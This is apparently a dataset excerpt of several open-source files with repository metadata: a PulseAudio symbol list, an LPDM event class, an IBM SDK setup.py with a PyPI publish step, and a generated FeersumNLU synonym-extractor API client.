'PA_SUBSCRIPTION_MASK_CLIENT', 'PA_SUBSCRIPTION_MASK_SAMPLE_CACHE',
'PA_SUBSCRIPTION_MASK_SERVER', 'PA_SUBSCRIPTION_MASK_AUTOLOAD',
'PA_SUBSCRIPTION_MASK_CARD', 'PA_SUBSCRIPTION_MASK_ALL',
'pa_subscription_event_type_t', 'PA_SUBSCRIPTION_EVENT_SINK',
'PA_SUBSCRIPTION_EVENT_SOURCE', 'PA_SUBSCRIPTION_EVENT_SINK_INPUT',
'PA_SUBSCRIPTION_EVENT_SOURCE_OUTPUT', 'PA_SUBSCRIPTION_EVENT_MODULE',
'PA_SUBSCRIPTION_EVENT_CLIENT', 'PA_SUBSCRIPTION_EVENT_SAMPLE_CACHE',
'PA_SUBSCRIPTION_EVENT_SERVER', 'PA_SUBSCRIPTION_EVENT_AUTOLOAD',
'PA_SUBSCRIPTION_EVENT_CARD', 'PA_SUBSCRIPTION_EVENT_FACILITY_MASK',
'PA_SUBSCRIPTION_EVENT_NEW', 'PA_SUBSCRIPTION_EVENT_CHANGE',
'PA_SUBSCRIPTION_EVENT_REMOVE', 'PA_SUBSCRIPTION_EVENT_TYPE_MASK',
'pa_timing_info', 'pa_spawn_api', 'pa_seek_mode_t', 'PA_SEEK_RELATIVE',
'PA_SEEK_ABSOLUTE', 'PA_SEEK_RELATIVE_ON_READ', 'PA_SEEK_RELATIVE_END',
'pa_sink_flags_t', 'PA_SINK_NOFLAGS', 'PA_SINK_HW_VOLUME_CTRL',
'PA_SINK_LATENCY', 'PA_SINK_HARDWARE', 'PA_SINK_NETWORK',
'PA_SINK_HW_MUTE_CTRL', 'PA_SINK_DECIBEL_VOLUME', 'PA_SINK_FLAT_VOLUME',
'PA_SINK_DYNAMIC_LATENCY', 'PA_SINK_SET_FORMATS', 'pa_sink_state_t',
'PA_SINK_INVALID_STATE', 'PA_SINK_RUNNING', 'PA_SINK_IDLE',
'PA_SINK_SUSPENDED', 'PA_SINK_INIT', 'PA_SINK_UNLINKED', 'pa_source_flags_t',
'PA_SOURCE_NOFLAGS', 'PA_SOURCE_HW_VOLUME_CTRL', 'PA_SOURCE_LATENCY',
'PA_SOURCE_HARDWARE', 'PA_SOURCE_NETWORK', 'PA_SOURCE_HW_MUTE_CTRL',
'PA_SOURCE_DECIBEL_VOLUME', 'PA_SOURCE_DYNAMIC_LATENCY',
'PA_SOURCE_FLAT_VOLUME', 'pa_source_state_t', 'PA_SOURCE_INVALID_STATE',
'PA_SOURCE_RUNNING', 'PA_SOURCE_IDLE', 'PA_SOURCE_SUSPENDED',
'PA_SOURCE_INIT', 'PA_SOURCE_UNLINKED', 'pa_free_cb_t', 'pa_port_available_t',
'PA_PORT_AVAILABLE_UNKNOWN', 'PA_PORT_AVAILABLE_NO', 'PA_PORT_AVAILABLE_YES',
'pa_mainloop_api', 'pa_io_event_flags_t', 'PA_IO_EVENT_NULL',
'PA_IO_EVENT_INPUT', 'PA_IO_EVENT_OUTPUT', 'PA_IO_EVENT_HANGUP',
'PA_IO_EVENT_ERROR', 'pa_io_event', 'pa_io_event_cb_t',
'pa_io_event_destroy_cb_t', 'pa_time_event', 'pa_time_event_cb_t',
'pa_time_event_destroy_cb_t', 'pa_defer_event', 'pa_defer_event_cb_t',
'pa_defer_event_destroy_cb_t', 'pa_mainloop_api_once',
'pa_channel_position_t', 'PA_CHANNEL_POSITION_INVALID',
'PA_CHANNEL_POSITION_MONO', 'PA_CHANNEL_POSITION_FRONT_LEFT',
'PA_CHANNEL_POSITION_FRONT_RIGHT', 'PA_CHANNEL_POSITION_FRONT_CENTER',
'PA_CHANNEL_POSITION_LEFT', 'PA_CHANNEL_POSITION_RIGHT',
'PA_CHANNEL_POSITION_CENTER', 'PA_CHANNEL_POSITION_REAR_CENTER',
'PA_CHANNEL_POSITION_REAR_LEFT', 'PA_CHANNEL_POSITION_REAR_RIGHT',
'PA_CHANNEL_POSITION_LFE', 'PA_CHANNEL_POSITION_SUBWOOFER',
'PA_CHANNEL_POSITION_FRONT_LEFT_OF_CENTER',
'PA_CHANNEL_POSITION_FRONT_RIGHT_OF_CENTER', 'PA_CHANNEL_POSITION_SIDE_LEFT',
'PA_CHANNEL_POSITION_SIDE_RIGHT', 'PA_CHANNEL_POSITION_AUX0',
'PA_CHANNEL_POSITION_AUX1', 'PA_CHANNEL_POSITION_AUX2',
'PA_CHANNEL_POSITION_AUX3', 'PA_CHANNEL_POSITION_AUX4',
'PA_CHANNEL_POSITION_AUX5', 'PA_CHANNEL_POSITION_AUX6',
'PA_CHANNEL_POSITION_AUX7', 'PA_CHANNEL_POSITION_AUX8',
'PA_CHANNEL_POSITION_AUX9', 'PA_CHANNEL_POSITION_AUX10',
'PA_CHANNEL_POSITION_AUX11', 'PA_CHANNEL_POSITION_AUX12',
'PA_CHANNEL_POSITION_AUX13', 'PA_CHANNEL_POSITION_AUX14',
'PA_CHANNEL_POSITION_AUX15', 'PA_CHANNEL_POSITION_AUX16',
'PA_CHANNEL_POSITION_AUX17', 'PA_CHANNEL_POSITION_AUX18',
'PA_CHANNEL_POSITION_AUX19', 'PA_CHANNEL_POSITION_AUX20',
'PA_CHANNEL_POSITION_AUX21', 'PA_CHANNEL_POSITION_AUX22',
'PA_CHANNEL_POSITION_AUX23', 'PA_CHANNEL_POSITION_AUX24',
'PA_CHANNEL_POSITION_AUX25', 'PA_CHANNEL_POSITION_AUX26',
'PA_CHANNEL_POSITION_AUX27', 'PA_CHANNEL_POSITION_AUX28',
'PA_CHANNEL_POSITION_AUX29', 'PA_CHANNEL_POSITION_AUX30',
'PA_CHANNEL_POSITION_AUX31', 'PA_CHANNEL_POSITION_TOP_CENTER',
'PA_CHANNEL_POSITION_TOP_FRONT_LEFT', 'PA_CHANNEL_POSITION_TOP_FRONT_RIGHT',
'PA_CHANNEL_POSITION_TOP_FRONT_CENTER', 'PA_CHANNEL_POSITION_TOP_REAR_LEFT',
'PA_CHANNEL_POSITION_TOP_REAR_RIGHT', 'PA_CHANNEL_POSITION_TOP_REAR_CENTER',
'PA_CHANNEL_POSITION_MAX', 'pa_channel_position_mask_t',
'pa_channel_map_def_t', 'PA_CHANNEL_MAP_AIFF', 'PA_CHANNEL_MAP_ALSA',
'PA_CHANNEL_MAP_AUX', 'PA_CHANNEL_MAP_WAVEEX', 'PA_CHANNEL_MAP_OSS',
'PA_CHANNEL_MAP_DEF_MAX', 'PA_CHANNEL_MAP_DEFAULT', 'pa_channel_map',
'pa_channel_map_init', 'pa_channel_map_init_mono',
'pa_channel_map_init_stereo', 'pa_channel_map_init_auto',
'pa_channel_map_init_extend', 'pa_channel_position_to_string',
'pa_channel_position_from_string', 'pa_channel_position_to_pretty_string',
'PA_CHANNEL_MAP_SNPRINT_MAX', 'pa_channel_map_snprint',
'pa_channel_map_parse', 'pa_channel_map_equal', 'pa_channel_map_valid',
'pa_channel_map_compatible', 'pa_channel_map_superset',
'pa_channel_map_can_balance', 'pa_channel_map_can_fade',
'pa_channel_map_to_name', 'pa_channel_map_to_pretty_name',
'pa_channel_map_has_position', 'pa_channel_map_mask', 'pa_operation',
'pa_operation_notify_cb_t', 'pa_operation_ref', 'pa_operation_unref',
'pa_operation_cancel', 'pa_operation_get_state',
'pa_operation_set_state_callback', 'pa_context', 'pa_context_notify_cb_t',
'pa_context_success_cb_t', 'pa_context_event_cb_t', 'pa_context_new',
'pa_context_new_with_proplist', 'pa_context_unref', 'pa_context_ref',
'pa_context_set_state_callback', 'pa_context_set_event_callback',
'pa_context_errno', 'pa_context_is_pending', 'pa_context_get_state',
'pa_context_connect', 'pa_context_disconnect', 'pa_context_drain',
'pa_context_exit_daemon', 'pa_context_set_default_sink',
'pa_context_set_default_source', 'pa_context_is_local', 'pa_context_set_name',
'pa_context_get_server', 'pa_context_get_protocol_version',
'pa_context_get_server_protocol_version', 'PA_UPDATE_SET', 'PA_UPDATE_MERGE',
'PA_UPDATE_REPLACE', 'pa_context_proplist_update',
'pa_context_proplist_remove', 'pa_context_get_index', 'pa_context_rttime_new',
'pa_context_rttime_restart', 'pa_context_get_tile_size',
'pa_context_load_cookie_from_file', 'pa_volume_t', 'pa_cvolume',
'pa_cvolume_equal', 'pa_cvolume_init', 'pa_cvolume_set',
'PA_CVOLUME_SNPRINT_MAX', 'pa_cvolume_snprint',
'PA_SW_CVOLUME_SNPRINT_DB_MAX', 'pa_sw_cvolume_snprint_dB',
'PA_CVOLUME_SNPRINT_VERBOSE_MAX', 'pa_cvolume_snprint_verbose',
'PA_VOLUME_SNPRINT_MAX', 'pa_volume_snprint', 'PA_SW_VOLUME_SNPRINT_DB_MAX',
'pa_sw_volume_snprint_dB', 'PA_VOLUME_SNPRINT_VERBOSE_MAX',
'pa_volume_snprint_verbose', 'pa_cvolume_avg', 'pa_cvolume_avg_mask',
'pa_cvolume_max', 'pa_cvolume_max_mask', 'pa_cvolume_min',
'pa_cvolume_min_mask', 'pa_cvolume_valid', 'pa_cvolume_channels_equal_to',
'pa_sw_volume_multiply', 'pa_sw_cvolume_multiply',
'pa_sw_cvolume_multiply_scalar', 'pa_sw_volume_divide',
'pa_sw_cvolume_divide', 'pa_sw_cvolume_divide_scalar', 'pa_sw_volume_from_dB',
'pa_sw_volume_to_dB', 'pa_sw_volume_from_linear', 'pa_sw_volume_to_linear',
'pa_cvolume_remap', 'pa_cvolume_compatible',
'pa_cvolume_compatible_with_channel_map', 'pa_cvolume_get_balance',
'pa_cvolume_set_balance', 'pa_cvolume_get_fade', 'pa_cvolume_set_fade',
'pa_cvolume_scale', 'pa_cvolume_scale_mask', 'pa_cvolume_set_position',
'pa_cvolume_get_position', 'pa_cvolume_merge', 'pa_cvolume_inc_clamp',
'pa_cvolume_inc', 'pa_cvolume_dec', 'pa_stream', 'pa_stream_success_cb_t',
'pa_stream_request_cb_t', 'pa_stream_notify_cb_t', 'pa_stream_event_cb_t',
'pa_stream_new', 'pa_stream_new_with_proplist', 'PA_ENCODING_ANY',
'PA_ENCODING_PCM', 'PA_ENCODING_AC3_IEC61937', 'PA_ENCODING_EAC3_IEC61937',
'PA_ENCODING_MPEG_IEC61937', 'PA_ENCODING_DTS_IEC61937',
'PA_ENCODING_MPEG2_AAC_IEC61937', 'PA_ENCODING_MAX', 'PA_ENCODING_INVALID',
'pa_stream_new_extended', 'pa_stream_unref', 'pa_stream_ref',
'pa_stream_get_state', 'pa_stream_get_context', 'pa_stream_get_index',
'pa_stream_get_device_index', 'pa_stream_get_device_name',
'pa_stream_is_suspended', 'pa_stream_is_corked', 'pa_stream_connect_playback',
'pa_stream_connect_record', 'pa_stream_disconnect', 'pa_stream_begin_write',
'pa_stream_cancel_write', 'pa_stream_write', 'pa_stream_write_ext_free',
'pa_stream_peek', 'pa_stream_drop', 'pa_stream_writable_size',
'pa_stream_readable_size', 'pa_stream_drain', 'pa_stream_update_timing_info',
'pa_stream_set_state_callback', 'pa_stream_set_write_callback',
'pa_stream_set_read_callback', 'pa_stream_set_overflow_callback',
'pa_stream_get_underflow_index', 'pa_stream_set_underflow_callback',
'pa_stream_set_started_callback', 'pa_stream_set_latency_update_callback',
'pa_stream_set_moved_callback', 'pa_stream_set_suspended_callback',
'pa_stream_set_event_callback', 'pa_stream_set_buffer_attr_callback',
'pa_stream_cork', 'pa_stream_flush', 'pa_stream_prebuf', 'pa_stream_trigger',
'pa_stream_set_name', 'pa_stream_get_time', 'pa_stream_get_latency',
'pa_stream_get_timing_info', 'pa_stream_get_sample_spec',
'pa_stream_get_channel_map', 'pa_stream_get_format_info',
'pa_stream_get_buffer_attr', 'pa_stream_set_buffer_attr',
'pa_stream_update_sample_rate', 'pa_stream_proplist_update',
'pa_stream_proplist_remove', 'pa_stream_set_monitor_stream',
'pa_stream_get_monitor_stream', 'pa_sink_port_info', 'pa_sink_info',
'pa_sink_info_cb_t', 'pa_context_get_sink_info_by_name',
'pa_context_get_sink_info_by_index', 'pa_context_get_sink_info_list',
'pa_context_set_sink_volume_by_index', 'pa_context_set_sink_volume_by_name',
'pa_context_set_sink_mute_by_index', 'pa_context_set_sink_mute_by_name',
'pa_context_suspend_sink_by_name', 'pa_context_suspend_sink_by_index',
'pa_context_set_sink_port_by_index', 'pa_context_set_sink_port_by_name',
'pa_source_port_info', 'pa_source_info', 'pa_source_info_cb_t',
'pa_context_get_source_info_by_name', 'pa_context_get_source_info_by_index',
'pa_context_get_source_info_list', 'pa_context_set_source_volume_by_index',
'pa_context_set_source_volume_by_name', 'pa_context_set_source_mute_by_index',
'pa_context_set_source_mute_by_name', 'pa_context_suspend_source_by_name',
'pa_context_suspend_source_by_index', 'pa_context_set_source_port_by_index',
'pa_context_set_source_port_by_name', 'pa_server_info', 'pa_server_info_cb_t',
'pa_context_get_server_info', 'pa_module_info', 'pa_module_info_cb_t',
'pa_context_get_module_info', 'pa_context_get_module_info_list',
'pa_context_index_cb_t', 'pa_context_load_module', 'pa_context_unload_module',
'pa_client_info', 'pa_client_info_cb_t', 'pa_context_get_client_info',
'pa_context_get_client_info_list', 'pa_context_kill_client',
'pa_card_profile_info', 'pa_card_profile_info2', 'pa_card_port_info',
'pa_card_info', 'pa_card_info_cb_t', 'pa_context_get_card_info_by_index',
'pa_context_get_card_info_by_name', 'pa_context_get_card_info_list',
'pa_context_set_card_profile_by_index', 'pa_context_set_card_profile_by_name',
'pa_context_set_port_latency_offset', 'pa_sink_input_info',
'pa_sink_input_info_cb_t', 'pa_context_get_sink_input_info',
'pa_context_get_sink_input_info_list', 'pa_context_move_sink_input_by_name',
'pa_context_move_sink_input_by_index', 'pa_context_set_sink_input_volume',
'pa_context_set_sink_input_mute', 'pa_context_kill_sink_input',
'pa_source_output_info', 'pa_source_output_info_cb_t',
'pa_context_get_source_output_info', 'pa_context_get_source_output_info_list',
'pa_context_move_source_output_by_name',
'pa_context_move_source_output_by_index',
'pa_context_set_source_output_volume', 'pa_context_set_source_output_mute',
'pa_context_kill_source_output', 'pa_stat_info', 'pa_stat_info_cb_t',
'pa_context_stat', 'pa_sample_info', 'pa_sample_info_cb_t',
'pa_context_get_sample_info_by_name', 'pa_context_get_sample_info_by_index',
'pa_context_get_sample_info_list', 'pa_autoload_type_t', 'PA_AUTOLOAD_SINK',
'PA_AUTOLOAD_SOURCE', 'pa_autoload_info', 'pa_autoload_info_cb_t',
'pa_context_get_autoload_info_by_name',
'pa_context_get_autoload_info_by_index', 'pa_context_get_autoload_info_list',
'pa_context_add_autoload', 'pa_context_remove_autoload_by_name',
'pa_context_remove_autoload_by_index', 'pa_context_subscribe_cb_t',
'pa_context_subscribe', 'pa_context_set_subscribe_callback',
'pa_context_play_sample_cb_t', 'pa_stream_connect_upload',
'pa_stream_finish_upload', 'pa_context_remove_sample',
'pa_context_play_sample', 'pa_context_play_sample_with_proplist',
'pa_strerror', 'pa_xmalloc', 'pa_xmalloc0', 'pa_xrealloc', 'pa_xfree',
'pa_xstrdup', 'pa_xstrndup', 'pa_xmemdup', '_pa_xnew_internal',
'_pa_xnew0_internal', '_pa_xnewdup_internal', '_pa_xrenew_internal',
'pa_utf8_valid', 'pa_ascii_valid', 'pa_utf8_filter', 'pa_ascii_filter',
'pa_utf8_to_locale', 'pa_locale_to_utf8', 'pa_threaded_mainloop',
'pa_threaded_mainloop_new', 'pa_threaded_mainloop_free',
'pa_threaded_mainloop_start', 'pa_threaded_mainloop_stop',
'pa_threaded_mainloop_lock', 'pa_threaded_mainloop_unlock',
'pa_threaded_mainloop_wait', 'pa_threaded_mainloop_signal',
'pa_threaded_mainloop_accept', 'pa_threaded_mainloop_get_retval',
'pa_threaded_mainloop_get_api', 'pa_threaded_mainloop_in_thread',
'pa_threaded_mainloop_set_name', 'pa_mainloop', 'pa_mainloop_new',
'pa_mainloop_free', 'pa_mainloop_prepare', 'pa_mainloop_poll',
'pa_mainloop_dispatch', 'pa_mainloop_get_retval', 'pa_mainloop_iterate',
'pa_mainloop_run', 'pa_mainloop_get_api', 'pa_mainloop_quit',
'pa_mainloop_wakeup', 'pa_poll_func', 'pa_mainloop_set_poll_func',
'pa_signal_event', 'pa_signal_cb_t', 'pa_signal_destroy_cb_t',
'pa_signal_init', 'pa_signal_done', 'pa_signal_new', 'pa_signal_free',
'pa_signal_set_destroy', 'pa_get_user_name', 'pa_get_host_name',
'pa_get_fqdn', 'pa_get_home_dir', 'pa_get_binary_name',
'pa_path_get_filename', 'pa_msleep', 'pa_gettimeofday', 'pa_timeval_diff',
'pa_timeval_cmp', 'pa_timeval_age', 'pa_timeval_add', 'pa_timeval_sub',
'pa_timeval_store', 'pa_timeval_load']
| 41.041276
| 168
| 0.806443
|
42146d9733d358ed91ccc5d2d78182e86e54b005
| 379
|
py
|
Python
|
simulation/lpdm_event/lpdm_buy_power_event.py
|
LBNL-ETA/LPDM
|
3384a784b97e49cd7a801b758717a7107a51119f
|
[
"BSD-3-Clause-LBNL"
] | 2
|
2019-01-05T02:33:38.000Z
|
2020-04-22T16:57:50.000Z
|
simulation/lpdm_event/lpdm_buy_power_event.py
|
LBNL-ETA/LPDM
|
3384a784b97e49cd7a801b758717a7107a51119f
|
[
"BSD-3-Clause-LBNL"
] | 3
|
2019-04-17T18:13:08.000Z
|
2021-04-23T22:40:23.000Z
|
simulation/lpdm_event/lpdm_buy_power_event.py
|
LBNL-ETA/LPDM
|
3384a784b97e49cd7a801b758717a7107a51119f
|
[
"BSD-3-Clause-LBNL"
] | 1
|
2019-01-31T08:37:44.000Z
|
2019-01-31T08:37:44.000Z
|
from lpdm_base_event import LpdmBaseEvent
class LpdmBuyPowerEvent(LpdmBaseEvent):
"""A grid controller notifies a power source how much power is available for purchase"""
def __init__(self, source_device_id, target_device_id, time, value):
LpdmBaseEvent.__init__(self, source_device_id, target_device_id, time, value)
self.event_type = "buy_max_power"
| 37.9
| 92
| 0.76781
|
f8669fc7d941027ed059d4d777c769383a681029
| 2,671
|
py
|
Python
|
setup.py
|
IBM/data-virtualization-on-cloud-python-sdk
|
9d0917854b1f0728f75e5f96141729ee37a40126
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
IBM/data-virtualization-on-cloud-python-sdk
|
9d0917854b1f0728f75e5f96141729ee37a40126
|
[
"Apache-2.0"
] | 9
|
2021-06-23T09:28:53.000Z
|
2021-11-09T02:04:56.000Z
|
setup.py
|
IBM/data-virtualization-on-cloud-python-sdk
|
9d0917854b1f0728f75e5f96141729ee37a40126
|
[
"Apache-2.0"
] | 3
|
2021-06-18T14:03:06.000Z
|
2021-06-22T07:00:23.000Z
|
#!/usr/bin/env python
# Copyright 2019, 2020 IBM All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
from setuptools.command.test import test as TestCommand
import os
import sys
import pkg_resources
__version__ = '0.1.0'
PACKAGE_NAME = 'ibm_data_virtualization_on_cloud'
PACKAGE_DESC = 'The IBM Data Virtualization on Cloud Python SDK'
with open('requirements.txt') as f:
install_requires = [
str(req) for req in pkg_resources.parse_requirements(f)
]
with open('requirements-dev.txt') as f:
tests_require = [str(req) for req in pkg_resources.parse_requirements(f)]
if sys.argv[-1] == 'publish':
# test server
os.system('python setup.py register -r pypitest')
os.system('python setup.py sdist upload -r pypitest')
# production server
os.system('python setup.py register -r pypi')
os.system('python setup.py sdist upload -r pypi')
sys.exit()
with open("README.md", "r") as fh:
readme = fh.read()
setup(
name=PACKAGE_NAME.replace('_', '-'),
version=__version__,
description=PACKAGE_DESC,
license='Apache 2.0',
install_requires=install_requires,
tests_require=tests_require,
author='IBM',
author_email='devxsdk@us.ibm.com',
long_description=readme,
long_description_content_type='text/markdown',
url='https://github.com/IBM/data-virtualization-on-cloud-python-sdk',
packages=[PACKAGE_NAME],
include_package_data=True,
keywords=PACKAGE_NAME,
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Libraries :: Application Frameworks',
],
zip_safe=True)
| 35.144737
| 79
| 0.693748
|
c0d262e131c4896ffaf2ca30b9323c8bff89bf0b
| 103,639
|
py
|
Python
|
feersum_nlu/api/synonym_entity_extractors_api.py
|
praekelt/feersum-nlu-api-wrappers
|
6580e2bab2c8a764fe868a505330b3fee6029074
|
[
"BSD-3-Clause"
] | 9
|
2017-10-10T12:24:23.000Z
|
2021-08-18T14:07:51.000Z
|
feersum_nlu/api/synonym_entity_extractors_api.py
|
praekelt/feersum-nlu-api-wrappers
|
6580e2bab2c8a764fe868a505330b3fee6029074
|
[
"BSD-3-Clause"
] | 1
|
2020-12-06T11:03:25.000Z
|
2021-04-14T05:21:23.000Z
|
feersum_nlu/api/synonym_entity_extractors_api.py
|
praekelt/feersum-nlu-api-wrappers
|
6580e2bab2c8a764fe868a505330b3fee6029074
|
[
"BSD-3-Clause"
] | 2
|
2019-02-12T08:26:06.000Z
|
2022-02-01T09:39:47.000Z
|
# coding: utf-8
"""
FeersumNLU API
This is the HTTP API for Feersum NLU. See https://github.com/praekelt/feersum-nlu-api-wrappers for examples of how to use the API. # noqa: E501
OpenAPI spec version: 2.0.54.dev2
Contact: nlu@feersum.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from feersum_nlu.api_client import ApiClient
class SynonymEntityExtractorsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def synonym_entity_extractor_add_testing_samples(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Add testing samples. # noqa: E501
Add testing samples to named extractor. Returns the samples added to the instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_add_testing_samples(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_add_testing_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_add_testing_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_add_testing_samples_with_http_info(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Add testing samples. # noqa: E501
Add testing samples to named extractor. Returns the samples added to the instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_add_testing_samples_with_http_info(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'synonym_sample_list', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_add_testing_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_add_testing_samples`") # noqa: E501
# verify the required parameter 'synonym_sample_list' is set
if ('synonym_sample_list' not in params or
params['synonym_sample_list'] is None):
raise ValueError("Missing the required parameter `synonym_sample_list` when calling `synonym_entity_extractor_add_testing_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'synonym_sample_list' in params:
body_params = params['synonym_sample_list']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/testing_samples', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_add_training_samples(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Add training samples. # noqa: E501
Add training samples to named extractor. Returns the samples added to the instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_add_training_samples(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_add_training_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_add_training_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_add_training_samples_with_http_info(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Add training samples. # noqa: E501
Add training samples to named extractor. Returns the samples added to the instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_add_training_samples_with_http_info(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'synonym_sample_list', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_add_training_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_add_training_samples`") # noqa: E501
# verify the required parameter 'synonym_sample_list' is set
if ('synonym_sample_list' not in params or
params['synonym_sample_list'] is None):
raise ValueError("Missing the required parameter `synonym_sample_list` when calling `synonym_entity_extractor_add_training_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'synonym_sample_list' in params:
body_params = params['synonym_sample_list']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/training_samples', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_create(self, create_details, **kwargs): # noqa: E501
"""Create a synonym entity extractor. # noqa: E501
Create a new synonym entity extractor or reload one from the trash. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_create(create_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SynonymEntityExtractorCreateDetails create_details: The details of the instance to create. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_create_with_http_info(create_details, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_create_with_http_info(create_details, **kwargs) # noqa: E501
return data
